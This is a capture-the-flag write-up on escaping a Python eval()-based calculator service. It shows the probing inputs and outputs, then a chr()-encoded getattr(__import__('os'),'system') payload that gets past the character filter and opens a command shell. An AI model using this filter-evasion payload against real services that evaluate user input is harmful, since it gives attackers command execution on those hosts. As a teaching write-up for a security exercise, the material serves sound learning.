So, this is one of the easier challenges. We were given some connection information, and here's what the service gave us upon connection:
Welcome to the online calculator. Please enter your expression below.
1
About to Calculate:
Calculating: 1
Equals: 1
At this point, we don't know much, except that it does some sort of calculation. A few more trials, and we've learned some useful information:
Welcome to the online calculator. Please enter your expression below.
1+1
About to Calculate:
Calculating: 1+1
Equals: 2
Welcome to the online calculator. Please enter your expression below.
2**200
About to Calculate:
Calculating: 2**200
Equals: 1606938044258990275541962092341162602522202993782792835301376
Welcome to the online calculator. Please enter your expression below.
2.5*2
About to Calculate:
Invalid Character: .
Please enter a mathematical operation
We've now gained some useful information. The first of those shows that it's using some sort of eval or exec. The second one shows that we're probably dealing with Python, judging by the fact that it accepts ** and can keep track of a number that big. Finally, we've discovered that at least some characters are being filtered, which is probably going to make things difficult.
It's now time to break out the Python knowledge and start poking around.
Welcome to the online calculator. Please enter your expression below.
locals()
About to Calculate:
Calculating: locals()
Equals: {'s': 'locals()'}
Welcome to the online calculator. Please enter your expression below.
globals()
About to Calculate:
Calculating: globals()
Equals: {'__builtins__': , '__file__': 'calculator.py', 'brokenSanitizeString': , '__package__': None, '__name__': '__main__', 'main': , '__doc__': None, 'calculator': }
Welcome to the online calculator. Please enter your expression below.
s
About to Calculate:
Calculating: s
Equals: s
Welcome to the online calculator. Please enter your expression below.
s test test test
About to Calculate:
Calculating: s test test test
Equals: Please enter a mathematical operation
There are a few important notes here. First, we found that there is only one object defined, s. Likewise, there are a couple of global functions: brokenSanitizeString(), calculator(), and main(). Finally, let's find out what's in that s object. It turns out that it's the input that we give to the function. Note the last result: we get the output from s, but still get the error from the fact that test is not defined.
Welcome to the online calculator. Please enter your expression below.
main(),main()
About to Calculate:
Calculating: main(),main()
Equals: Welcome to the online calculator. Please enter your expression below.
1+1
About to Calculate:
Calculating: 1+1
Equals: 2
Welcome to the online calculator. Please enter your expression below.
2+2
About to Calculate:
Calculating: 2+2
Equals: 4
(None, None)
We've now found an important trick. By calling main(), we get another opportunity to input more data.
Now we know everything needed to get some exploiting going on. First, we'll be using what may be a lesser-known function, __import__. Some experimentation shows that the program is using eval() on our input, which means we can only use functions, so tricks like `/bin/sh` aren't going to work. Instead, what we're going to do is getattr(__import__('os'), 'system')('/bin/sh'). By converting that entire string to ASCII values, combining them into one nice string, and letting the calculator evaluate it, we get...
Welcome to the online calculator. Please enter your expression below.
getattr(eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)
+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)
+chr(41)),chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109))
(chr(99)+chr(109)+chr(100))
About to Calculate:
Calculating: getattr(eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)
+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)
+chr(115)+chr(39)+chr(41)),chr(115)+chr(121)+chr(115)+chr(116)+chr(101)
+chr(109))(chr(99)+chr(109)+chr(100))
Equals:Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Yes, I'm using Windows, so I called cmd instead, but it's all good.
Also, I've been informed that this challenge is a little on the difficult side to find, so I've hosted it here: http://www.theskolor.net/ctfs/calculator.zip. If one of the PPP guys has an issue with this, just let me know and I'll take it down.